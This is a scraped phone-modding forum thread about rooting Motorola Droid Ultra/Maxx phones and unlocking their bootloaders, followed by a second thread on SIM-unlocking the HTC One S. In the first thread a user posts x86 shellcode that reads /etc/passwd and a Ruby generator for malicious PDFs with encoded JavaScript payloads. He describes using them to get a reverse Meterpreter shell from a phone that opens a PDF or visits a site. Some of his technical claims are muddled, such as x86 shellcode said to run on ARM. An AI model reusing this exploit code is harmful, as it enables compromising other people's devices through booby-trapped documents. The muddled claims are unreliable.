I know that this may seem like a stupid question, but then again I never claimed to be smart but have a couple of the people who purchased unlock codes actually gotten together and taken each imei and the unlock code, then ran a script or application to generate different algorithms and functions until the same key was able to creates the unlock code properly based on the imei of the phone?
To be quite honest, it really can not be that difficult, my guess would be some sort of offset chr count of the imei and using an XOR on it or polymorphic additive encoding.
Anyway, I did just get a droid ultra, should have it tomorrow, and I will be writing a shellcode exploit for it, so I just need to wrap that into an apk, and then when it runs have it escalate into system priv's and see if I can then gain root access from that. As far as developing a way to unlock the bootloader I will need to do more research how they are setup and what they process and how before I can really say anything.
What I currently have done which would work on any ARM processor running some sort of x86 *nix
#include <stdio.h>
const char shellcode[]="\x31\xc0" // xorl %eax,%eax
"\x99" // cdq
"\x52" // push edx
"\x68\x2f\x63\x61\x74" // push dword 0x7461632f
"\x68\x2f\x62\x69\x6e" // push dword 0x6e69622f
"\x89\xe3" // mov ebx,esp
"\x52" // push edx
"\x68\x73\x73\x77\x64" // pu sh dword 0x64777373
"\x68\x2f\x2f\x70\x61" // push dword 0x61702f2f
"\x68\x2f\x65\x74\x63" // push dword 0x6374652f
"\x89\xe1" // mov ecx,esp
"\xb0\x0b" // mov $0xb,%al
"\x52" // push edx
"\x51" // push ecx
"\x53" // push ebx
"\x89\xe1" // mov ecx,esp
"\xcd\x80" ; // int 80h
int main(){
(*(void (*)()) shellcode)();
return 0;
}
/*
shellcode[]= "\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64"
"\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80";
*/
Wrong section as questions go in q&a. It's been discussed and it would take several lifetimes.
Sent from my XT1080 using XDA Free mobile app
Several lifetimes according to whom? They used to say the same thing about cracking WPA2 handshakes but with CUDA and a couple of very nice graphics cards it is cut down to just a few minutes. I just thought I would put it out there..
I think I may have found a way to root the latest version but you need to install script manager and run a sh file on your phone, so I have noticed that a lot of users, if you do not just have an exe you can open and click and done they have a lot of problems so I am not sure how well it woudl fare if you had to install a script manager, install a script, then run the script.
So I may actually be getting somewhere. I have found an exploit that is brand new, so no new version have come out to patch it, all you would need to do is visit a website OR download and open a pdf on your droid and it would allow the execution of arbitrary code (yes for the ARM architecture).
Now I was able to successfully get the droid to connect back to my computer with a reverse tcp metrepreter connection. I had tried that first to see if I could use any of the post modules to gain an escalated privilege.
As many of you know this is the tougher part since the newer version of android use a type of sandbox with their applications so each application that is opened has its own memory and processor dedicated to it.
I am not giving up though, now that I found a way to dorce the droid to execute code that it shouldn's that is the main weakness, not we just need the next step which could be making another user with root priv's to ssh into the phone with, to change the r/w permissions on certain folders, I mean this is only step one of many but progress is being made, and I don't think for my first droid app I am not doing so bad.
I am open to ideas if you guys/gals have any, this is what I did to get the connection. It is an exploit in the pdf reader that you can base64 encode and then zlib compress javascript exploits into the pdf, then as the pdf opens it compresses the script and executes it.
Code:
def add_compressed(n, data) add_object(n, Zlib::Inflate.inflate(Rex::Text.decode_base64(data)))
end
def pdf(js)
self.eol = "\x0d"
@xref = {}
@pdf = header('1.6')
add_compressed(25, "eJzjtbHRd0wuynfLL8pVMDFQMFAI0vdNLUlMSSxJVDAGc/0Sc1OLFYyNwBz/0pKczDwg3xzMDUhMB7INzcCc4ILMlNQiz7y0fAUjiOrgkqLS5JKQotTUoPz8EgVDiPkhlQWp+s5AC3Ly0+3seAG6CSa9")
add_compressed(40, "eJzjtbHRd3HU0PdIzSlTMFAISQMS6Qqa+i5BQAnXvOT8lMy8dCAzwMXNJT8ZJqBgYgpUF2Rnp++Wn1cClPZIdcpXMLYECUKMMjEHs6MSXZIUTCwgikHKM1NzUoqjjcEisXZ2vADEuSJw")
add_compressed(3, "eJztV91umzAUfoK8g8UuN2OMIQkWUFWJplUqU7VGam+N7aSs/AmMQvtqvdgj7RVmEpKRNJp2M2kXWAjZ+Hzfd3zO4Uie+D66lflGPQFCMEH3TaxeSokeo1u06iaRVEwwxcKwVpVk2cS/akvGn6UCsdwkeWD8fPthgEQExoMbWVG5kE/Jl9dK3r9+XfHXZ+4J4yqc+C1tszLTZKDN0rymbWAwUcSS6nn3GRlgZ6KeA+O62wCP0R1YFJUErulAblkumM1N7MyIPf0EbAvbyJojm0BMqNU9oB9GONFvvxJr+m35uZfTq8B4UqqkCG23W3NLzKLaIOx5HrJsZNtQW8D6JVeshXn9YU9y4FnKmldJqZIiB92axUWjAsOYgMHoz5WVR6G8NndnNHmRoZaVCJsWugQS/IgpmyrduSY4kqnMZK5qjcMXcVosiv4sl2UXkeUgHic4vaFxBB0D0MVA69CoEMn6ZcmUDHXwHWi5kOAVtil2qD3VS2pZPjqzPONY6ApScsBBdhyEEpe6+KNlHzkGlud+9AX5V54MbS/5UlSrokjDfcFd86qImQJYx23gRW8zgAtO10WVMRWyskwTzrrC6CLno99bp/YqUenQhUNlXafq9OthI026TNGU5ZvAaKGQa9akygi/16ZqlY/2NmeM6D3lzqVzdX9XOHRZ8KYrsJtl2DSJoJ6Yu1NPSjhbizl0nJhBj885nErXtl3iejFzd4E5xb7jvclrxXIuD7wOn1nONNaZcjwCPcuJIXNdGwqOZ3ObxySO8YF3gB3w6tjSu6oQDZdVeMjTg4zBgpWq0T1in7MTs8kwKIM/eN8eUN8fdGtCx970LhX/ZIwio8goMoqMIqPIKPJfiQxuNzLXV5ptd3fRs/7u8wtzq37r")
add_compressed(32, "eJzjtbHR93QJVjA0VzBQCNIPDfIBsi1AbDs7XgBc3QYo")
add_compressed(7, "eJzjtbHRd84vzStRMNJ3yywqLlGwUDBQCNL3SYQzQyoLUvX9S0tyMvNSi+3seAF54Q8a")
add_compressed(16, "eJzjtbHRd84vzStRMNT3zkwpjjYyUzBQCIrVD6ksSNUPSExPLbaz4wUA0/wLJA==")
add_compressed(22, "eJzjtbHRD1Mw1DMytbPjBQARcgJ6")
add_compressed(10, "eJzjtbHRd85JLC72TSxQMDRUMFAI0vdWMDQCMwISi1LzSkKKUlMVDI3RRPxSK0q8UysVDPVDKgtS9YNLikqTwRJB+fkldna8AIaCG78=")
add_compressed(11, "eJzjtbHRDy5IKXIsKgGy/PXDU5OcEwtKSotS7YCAFwCW+AmR")
add_compressed(12, "eJzjtbHR91YwNFUwUAjSD1AwNAAzgvVd8pNLc1PzSuzseAGGCwiD")
add_compressed(13, "eJzjtbHR9yvNLY42UDA0UTBQCIq1s+MFADohBRA=")
add_compressed(14, "eJzjjTY0VTBQCFKAULG8ABzfA0M=")
add_compressed(15, "eJzjtbHRd9YPLkgpciwq0feONlAwjNUPUDA0UjBQCNIPSFcwMgOzgvWB8pnJOal2drwAYtsNjA==")
add_compressed(26, "eJx1jk0KwkAMhU/QO+QEnRmnrQiloBXEhVBaV4qLoQ0iyGSYH9Dbm7ZrAwn54L2XZHUt9tZSDFAokNCLlmxEy1wWK3tyB/rcZS5h7kpteG53PB/i5Ck50KvyfARdLtsFp5f5a+puoHIpOuP5DqhqsfQYKPkRAz/U0pv84MyIMwwStJ41DZfoKZqIIMUQfRrjGhKYr1+HnPnEpsl+Bag7pA==")
add_compressed(41, "eJzjjTa2UDBQCIrlBQAKzAIA")
add_compressed(54, "eJwBzwAw/w08PC9GaWx0ZXIvRmxhdGVEZWNvZGUvTGVuZ3RoIDE1ND4+c3RyZWFtDUiJXE7BDcIwFLv3K/IFvlatYzAG66bgYSDM2/BQa6cDXWV7gv69m7d5SEISCKGs57axjpEklDFbd/MX1GQCc3jgRMaEN2oNDSVHrMeoep358/SgXQjse9Dx5w722naW29AhTU2RQ2zLkSivJNwABQyuE0pitYGO1SLSiJbxJL0XjaDpibv76UiZ7wvI+cx/rWb1V4ABAMukNiwNZW5kc3RyZWFtDcyfYBU=")
add_compressed(34, "eJzjtbHRdw5WMDZTMFAI0g/WDylKzCsuSCxKzUuutLPjBQB75gjK")
add_compressed(35, "eJzj1ZA6peCnxVrNzHD3v1xSmdpmTV4AOosGFg==")
add_compressed(33, "eJzjjdb3dHZ2SixOTVEwslQwUAiK5QUANnUE/Q==")
add_compressed(29, "eJwBEQHu/g08PC9GaWx0ZXIvRmxhdGVEZWNvZGUvTGVuZ3RoIDIxNi9OIDE+PnN0cmVhbQ1IiWJgYJzh6OLkyiTAwJCbV1LkHuQYGREZpcB+noGNgZkBDBKTiwscAwJ8QOy8/LxUBgzw7RoDI4i+rAsyC1MeL2BNLigqAdIHgNgoJbU4GUh/AeLM8pICoDhjApAtkpQNZoPUiWSHBDkD2R1ANl9JagVIjME5v6CyKDM9o0TB0NLSUsExJT8pVSG4srgkNbdYwTMvOb+oIL8osSQ1BagWagcI8LsXJVYquCfm5iYqGOkZkehyIgAoLCGszyHgMGIUO48QQ4Dk0qIyKJORyZiBASDAAEnGOC8NZW5kc3RyZWFtDYkear8=")
add_compressed(36, "eJzjjdb3dHZ2SixOTVEwNlAwUAiK5QUANj4E9Q==")
add_compressed(30, "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")
add_compressed(38, "eJxNjbEOgjAYhJ+Ad/hHWPgplIoJaVIwaGIwRGsciAtYCFGLQx18e1vi4HDDXe6+8/IcBdAEIjiiaKw7QEqc4xw3wsedKmYgMcjBhmOAFVCsJBZGYzUAS9OEYb23u2LbkjCCn65YCr98TP0dnipA2QCxwAZitjwdVW/ayFajkBGasQwYIWGSUVitY7c+vTvzeSm8TLdRGZR+Z/SCqx3t/I92NaH1bDj3vvt1NZc=")
add_compressed(43, "eJzjtbHR9wpWMDFTMFAI0g/W90osSwxOLsosKLGz4wUAaC0Hzw==")
add_compressed(51, "eJxNjtEKgkAQRb9g/mG/wHHRTEF8kPCpyDIoEB/UJivQrXUF+/t2Y4seLnPhzj1ciGNMUzGXruMyo4Bzxwt9tozMXVSYCdkfXg9iHNc0dOrKAh83tZK3ueS2ZPTnK9zTKCbZ0qjxuRRtQarEfJVVSYLF1CjN+4DRkPG0be7UqiQZlaS6B8460CC7xQu/YziTBBd46gfOAjeyYRj9wiMMsAMazpb0BnLmPE4=")
js = Zlib::Deflate.deflate(js)
add_object(46, "\x0d<</Filter[/FlateDecode]/Length #{js.length}>>stream\x0d#{js}\x0dendstream\x0d")
add_compressed(8, "eJzjtbHRd84vzStRMNR3yywqLlGwVDBQCNL3SYQzAxKLUoHy5mBOSGZJTqqGT35yYo6CS2ZxtqadHS8AmCkTkg==")
add_compressed(9, "eJzjtbHRd0ktLok2MlMwUAjSj4iMAtLmlkYKeaU5ObH6AYlFqXklChZgyWBXBUNTMCsksyQnVePff4YshmIGPYYShgqGEk07O14AWScVgw==")
add_compressed(17, "eJzjtbHR90vMTS2ONjZVMFAIUjAyAFGxdna8AF4CBlg=")
add_compressed(18, "eJzjtbHR90vMTS2ONrRUMFAIUjAyAFGxdna8AF4gBlo=")
add_compressed(19, "eJzj1UjLzEm10tfXd67RL0nNLdDPKtYrqSjR5AUAaRoIEQ==")
add_compressed(20, "eJzjtbHRdw7RKEmtKNEvyEnMzNPU93RRMDZVMFAI0vePNjIDMWL1g/WDA4DYU8HIECwTovHvP0MWQzGDHkMJQwVDiaZ+SLCGi5WRgaGJgbGxoaGhsampUZSmnR0vAOIUGEU=")
add_compressed(21, "eJzjtbHRdwxVMLRUMFAI0g8J1nCxMjIwNDEwNjY0NDQ2NTWK0rSz4wUAmbEH3g==")
add_compressed(39, "eJzjtbHRd0osTnXLzyvR90jNKUstyUxO1HXKz0nRd81Lzk/JzEtXMDFVMFAI0vdLzE0FqnHK1w8uTSqpLEjVDwEShmBSH2SAnR0vACeXGlQ=")
add_compressed(47, "eJzjtbHRd0osTnXLzyvR90jNKUstyUxO1HfNS85PycxLVzAxVTBQCNL3S8xNBUvrB5cmlVQWpOqHAAlDMKkP0mtnxwsAqd8Y1w==")
add_compressed(48, "eJzjtbHRd0osTnXLzyvRj0osSHPJzEtPSiwp1vdLzE0Firgk6QeXJpVUFqTqhwAJQzCpD1JuZ8cLAJhsFTA=")
add_compressed(45, "eJxNk81u2zAMx5+g75AnGJe0yFKgKGB0PgQYlsOaQzfswEi0LUSWUn1ky55+tJiovkQm+f+RFMXcPT3BV9N1FMgpir9WD3AIdCZQGLwDZYLKY2fpL2ifUClyCYbsegx5tJgT+N47OkIwrodkrKbF/SO8Z58ossvS4nENfcAzLZarDRyytZRAY99TuB76YIGsNadoItCoMQ5Arhyd9ZwYuoAqGW6nz8aWtJa69GEF0w8JRuNyhBOFNPgc0Wlpg9MfMFI1CnozhCzWh3/mLOkLngJqGjEcoTPcF3yLdupw18IPGdWbNjzE6Q4/xcEDsxSjAStSTxAl8q8ci+X6M7Q5eP54AJXD9AQXNtb8BP5I7oCBrQ3UxMqfLtKcD7ojvrBxPNcvK7C+Nwqt8wk+8Y+mDgL1JvJlSMOIqjREfSCCk81RZpX++Jh5YMYHSAPHqoUqJ4IxL5abeyg+PT19yaZIG2sR+N2rnvsZMapsS0ObzRR8zxiYmD4HtJ1UuDrjYvm4gqYsBjRSrZktW1NWCZp69aYsWNPCy618K3ArcDuD20ptRbMVzXam2VZNmwb4LuV2It+JfDeT766CSo3ZJnOyF9jJ4+4F3Qu6n6H7yrxJ8HXwgVeZwsg7erARUFiUMM5YlLJYU2AZA/Lf8zYGEpgEphlMlTKiMaIxM42pGuIxOCnnRe5F7mdyfxVUSpuzmRwyhCxgFjDPwFyJiwRTGcLl5v4Nr5cTv6JTnNv1z893/wElCbzZ")
add_compressed(23, "eJxNzLEKgzAQgOEn8B2ymVCqd4npUEQQXQsdCp0Tc4Ol9Ep6Qh+/gg7d/+8v2rYeMgWZ+TUGIT2eLWADziE65z0ewJYApdkqzrpPHEn1U+YYRCFWYOoLp3/sV2yxsacj+A1fM6dlolXv7k5RDeEtS6b9cZvlSfrxqeQrpuuKH+VYK70=")
@xref_offset = @pdf.length
@pdf << xref_table << trailer(25) << startxref
@pdf
Ok, i have gotten it to work!! A simple 4 minute process that ia automated which roots your phone proper 4.4 instead of tethered and also changes the write protection to 0 no matter how many times you reboot.
Working on the directions right now and also screen shots, I understand I am not a reputable member here since I barely ever speak up but if there i anyone familiar with assembly that would like to review my code you are more than welcome to, I started with C#, then went to C, and ended up having to use assembly to do it... crazy..
Now, just need the algorithm to pop the boot loader yes? If someone would like to supply me via PM how I can get an unlock code for this phone or how I could get 3 or 4 imei with their unlock codes it would make this process much faster.
I look forward to see your automated release sounds awesome. Also I hope you can get the bootloader unlocked at that point I will donate to you 100.00 since I have a 2013 model and the China Man Cant Come Through on 2013 models only 2014 !!!!!!
Thanks,
rbgCODE said:
Ok, i have gotten it to work!! A simple 4 minute process that ia automated which roots your phone proper 4.4 instead of tethered and also changes the write protection to 0 no matter how many times you reboot.
Working on the directions right now and also screen shots, I understand I am not a reputable member here since I barely ever speak up but if there i anyone familiar with assembly that would like to review my code you are more than welcome to, I started with C#, then went to C, and ended up having to use assembly to do it... crazy..
Now, just need the algorithm to pop the boot loader yes? If someone would like to supply me via PM how I can get an unlock code for this phone or how I could get 3 or 4 imei with their unlock codes it would make this process much faster.
Click to expand...
Click to collapse
bluh5d said:
I look forward to see your automated release sounds awesome. Also I hope you can get the bootloader unlocked at that point I will donate to you 100.00 since I have a 2013 model and the China Man Cant Come Through on 2013 models only 2014 !!!!!!
Thanks,
Click to expand...
Click to collapse
I appreciate that but I am not doing this for the bounty, I am a strong believer in open source and I want to be able to use my phone to it's fullest. I think I have a 2013 model as well. oh no Build Date wed apr .. hmmm where is the actual build date lol
Hey man. Any progress? Could u at least release your root exploit. I already have permanent root, but some people aren't smart enough or savvy enough to turn the tethered root into a full root via Safestrap and flashing superSU, then use motowpnomo to disable write protection. Its no boot loader unlock though. That's what I'm interested in.
Sent from my XT1030 using XDA Premium 4 mobile app
rbgCODE said:
Ok, i have gotten it to work!! A simple 4 minute process that ia automated which roots your phone proper 4.4 instead of tethered and also changes the write protection to 0 no matter how many times you reboot.
Working on the directions right now and also screen shots, I understand I am not a reputable member here since I barely ever speak up but if there i anyone familiar with assembly that would like to review my code you are more than welcome to, I started with C#, then went to C, and ended up having to use assembly to do it... crazy..
Now, just need the algorithm to pop the boot loader yes? If someone would like to supply me via PM how I can get an unlock code for this phone or how I could get 3 or 4 imei with their unlock codes it would make this process much faster.
Click to expand...
Click to collapse
Best news I've heard in a while. Hope you're onto something. Please keep us posted? My 4.4 needs some root love
rbgCODE said:
I appreciate that but I am not doing this for the bounty, I am a strong believer in open source and I want to be able to use my phone to it's fullest. I think I have a 2013 model as well. oh no Build Date wed apr .. hmmm where is the actual build date lol
Click to expand...
Click to collapse
My build date is Dec 6, 2013. Employee Edition. Full rooted and write protection off. Just hoping for a bootloader crack. I was late on the whole bootloader china codes. Damn.
Hello
Got any news on unlocking the BL?
I've got Ultra assembled in 2014, if you need some testers I'm always ready to help:good:
Bootloader unlock for Motorola Devices with msm8960..
http://blog.azimuthsecurity.com/2013/04/unlocking-motorola-bootloader.html?m=1
iAjayIND said:
Bootloader unlock for Motorola Devices with msm8960..
http://blog.azimuthsecurity.com/2013/04/unlocking-motorola-bootloader.html?m=1
Click to expand...
Click to collapse
Uhhhh, our devices are msm8960dt...
Sent from my DROID MAXX using Tapatalk
iAjayIND said:
Bootloader unlock for Motorola Devices with msm8960..
http://blog.azimuthsecurity.com/2013/04/unlocking-motorola-bootloader.html?m=1
Click to expand...
Click to collapse
Did you even read the article it doesn't mention any of our phones.
sent from "my kungfu is stronger than yours" XT1080
Any new developments on this? I am THOROUGHLY interested! Would this be able to give us wp off again if we are on 4.4.4?
Sent from my XT1080 using XDA Free mobile app
is Chinese man stopped giving unlock codes for droid Maxx??I'm not getting any replay from him
Sent from my XT1080 using XDA Premium 4 mobile app
aneeshmbabu said:
is Chinese man stopped giving unlock codes for droid Maxx??I'm not getting any replay from him
Sent from my XT1080 using XDA Premium 4 mobile app
Click to expand...
Click to collapse
That has nothing to do with this thread.
Sent from my DROID MAXX using Tapatalk
Related
Does anyone know if it is easy to unlock a network locked One S. Of course everyone is advertising imei unlock codes but I'm not sure if they would be available straight away. Has anyone successfully done this yet? It makes a huge difference to me whether or not I get myself a contract phone (cheaper) or by a SIM free one
Yes, I am after the answer as well, hope to hear from anyone soon.
thx!
theres this guide, But its for the Sensation - its a similar device in terms of spec.
the values maybe different, but if someone understands what they mean (not me) they might be able to adjust it for the One S.
http://forum.xda-developers.com/showthread.php?t=1232107
Cant wait til development starts properly for this phone, Its really slow at the mo
unfortunately it didnt work for me
Code:
C:\Program Files\Android\android-sdk\platform-tools>adb shell
[email protected]:/ $ su
su
[email protected]:/ # strings -n 8 /dev/block/mmcblk0p6
strings -n 8 /dev/block/mmcblk0p6
sh: strings: not found
azzledazzle said:
theres this guide, But its for the Sensation - its a similar device in terms of spec.
the values maybe different, but if someone understands what they mean (not me) they might be able to adjust it for the One S.
http://forum.xda-developers.com/showthread.php?t=1232107
Cant wait til development starts properly for this phone, Its really slow at the mo
Click to expand...
Click to collapse
azzledazzle said:
theres this guide, But its for the Sensation - its a similar device in terms of spec.
the values maybe different, but if someone understands what they mean (not me) they might be able to adjust it for the One S.
http://forum.xda-developers.com/showthread.php?t=1232107
Cant wait til development starts properly for this phone, Its really slow at the mo
Click to expand...
Click to collapse
Sure it's slow, there are only 10 people who have it atm I will be 11th today hopefully.
Seriously, I wouldn't be too much worried, it's just first few weeks of its life. Which is exciting, I remember when I got my SGS in 2010. It feels great to be part of the development almost from day 1.
Sent from my GT-I9000 using xda premium
azzledazzle said:
theres this guide, But its for the Sensation - its a similar device in terms of spec.
the values maybe different, but if someone understands what they mean (not me) they might be able to adjust it for the One S.
http://forum.xda-developers.com/showthread.php?t=1232107
Cant wait til development starts properly for this phone, Its really slow at the mo
Click to expand...
Click to collapse
Very surprised to see this method in sensation. Cos to my understanding the SIM unlock is at network level rather than something you can alter on the phone. So I was wrong.
Hope the same method can be ported to one s in the future.
By the way, I know there are lots of website charges 10 or 20 pounds to SIM unlock devices, they send you an email with unlock code back short after payment is received. Just wondering if anyone had tried any website which does this for one s? Don't mind pay a small money just to avoid rooting.
Sent from my HTC Incredible S using XDA
Just wait, There will be a proper SIM Unlock tool soon
I hate it when phones come sim locked it drives me mad, Ive never had a sim locked phone from vodafone,,,, Although every one ive had has been branded I hate that too
if u can get a code cheap enough do it, But i wouldnt pay anything more than £10 for an unlock code.. There will be a tool for free posted on here soon
azzledazzle said:
Just wait, There will be a proper SIM Unlock tool soon
I hate it when phones come sim locked it drives me mad, Ive never had a sim locked phone from vodafone,,,, Although every one ive had has been branded I hate that too
if u can get a code cheap enough do it, But i wouldnt pay anything more than £10 for an unlock code.. There will be a tool for free posted on here soon
Click to expand...
Click to collapse
That's the spirit.
Sent from my GT-I9000 using xda premium
Disclaimer: Not tested as I have not rooted yet.
Try cat /proc/emmc
That should give a list of partitions. It may be that it's simply in a different slot.
You can compare it to the list at http://forum.xda-developers.com/showthread.php?t=1168521
Maybe that'll be enough clues to find out where it is. Then simply run
strings -n 8 /dev/block/mmcblk0pX
after replacing X with your best guess
Hey guys,
About to buy a SIM locked One S today, anyone made any progress on a way to remove the SIM lock?
Cheers,
M
I'm pretty sure the method from Sensation requires S-OFF.
Sent from my HTC One S using xda premium
I've unlocked my HTC One S a few days after release from t-mobile. I just called them up and asked them for an unlock code. Took HTC about 3 days to finally give me one but all in all took me less than a week since release date to get it unlocked. Hope that helps people? Took me another 2 days to find someone with a non-tmobile sim to actually unlock the phone but all is done now.
Hi mate, i got mine unlocked off ebay for about £3..unlocked within 5 minutes
I called T Mobile yesterday and gave them the imei for my One S. I got an email this morning from them with the unlock code. I popped in my ATT SIM and entered the code and poof it was unlocked. It works on ATT HSPA by the way, if you were wondering
Sent from my HTC One S using xda premium
rahularora1 said:
Hi mate, i got mine unlocked off ebay for about £3..unlocked within 5 minutes
Click to expand...
Click to collapse
Link please? I can only see ones for about £15.....
ascot17 said:
Link please? I can only see ones for about £15.....
Click to expand...
Click to collapse
I did mine on ebay too (was a bit unsure but it was £15 for Three to do it) the item was #261012095238. It says on there the phone must be on server for a month but mine was only 3 days old and they sent me the code straight away (and it worked!)
Hope that helps
pauled29 said:
I did mine on ebay too (was a bit unsure but it was £15 for Three to do it) the item was #261012095238. It says on there the phone must be on server for a month but mine was only 3 days old and they sent me the code straight away (and it worked!)
Hope that helps
Click to expand...
Click to collapse
Thanks - I had only searched under "One S" which is why I had not found that one!
Could anyone who has used an unlock code to successfully unlock their phone take a look at this thread and see if you can help?
We are close to getting a free sim unlock hack for all but need a few contributors for testing purposes.
Thanks!
Okay, so. Rogers One XL and AT&T One X are basically the same device right? Same essentially all the way through? Would it be super farfetched to think that if one were to take the file that is modified by the HTCdev unlock for the Rogers One XL, and push it to the AT&T One X, that it would unlock it? I'm sure there's something making this completely illogical and impossible but I figured maybe I'd mention it, though I'm sure it's been thought of.
Unless I'm mistaken your unlock is directly related to your phone's iemi number.
I had a feeling that would be the case.
gunnyman said:
Unless I'm mistaken your unlock is directly related to your phone's iemi number.
Click to expand...
Click to collapse
I suppose you can't change something like that?
Sent from my HTC One X
